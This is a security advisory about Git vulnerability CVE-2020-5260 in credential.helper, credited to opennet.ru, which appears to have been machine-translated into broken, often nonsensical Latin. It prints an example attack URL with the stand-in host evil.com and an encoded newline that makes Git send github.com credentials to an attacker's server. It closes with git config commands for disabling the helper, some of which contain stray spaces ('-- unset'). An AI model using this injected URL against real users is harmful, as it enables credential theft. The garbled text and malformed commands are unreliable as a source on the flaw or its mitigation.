Git vulnerability credential ultrices

Published emenda emissiones fonte distributo moderandi ratio Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4, in. quae removeatur vulnerability (CVE, 2020 5260,) in manubrio "credential.helper", quod causat documentorum mitti ad hospitem iniuriam cum accessiones clientium repositio utens domicilio speciali formato characterem novum continentem. Exposita vulnerabilitas adhiberi potest ad disponendum documentorum ab alia hospitio mittenda servo regi ab oppugnante.

Cum URL specificans ut "https://evil.com?%0ahost=github.com/", tracto credentialis cum exercitui malo.com connectens transiturus est parametri authenticas pro github.com definitas. Difficultas incidit cum operationes exercens sicut "git clone", inclusa delata processus pro submodulibus (exempli gratia "git submodule renovatio" sponte processuras URLs de quibus in gitmodules tabella repositorium. vulnerabilitas periculosissima est in condicionibus ubi repositorium claudit elit, non viso domicilio, exempli gratia cum laborantibus cum submodulibus, vel in systematibus quae automataria opera exercent, exempli gratia, in involucris scriptis aedificandis.

Ut angustos vulnerabilities in novis versionibus prohibitus characterem novum transeundo in quibusvis valoribus per documentorum commercium protocollum transmittendum. Pro distributionibus emissionem updates in paginis indagare potes debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arcus, FreeBSD.

Sicut habemus habemus angustos quaestio commendatae Noli utere credential.helper cum repositoriis publicis accedens nec "git clone" in "--recurse-submodulibus" modum repositoriis immoderatis utere. Ut omnino disable credential.helper tracto, quod facit conservatam agnovimus et retrieving passwords e cache, tutis repositoria vel fasciculus cum passwords, iussa uti potes;

git config --unset credential.helper
git config --global -- unset credential.helper
git config --system -- unset credential.helper

Source: opennet.ru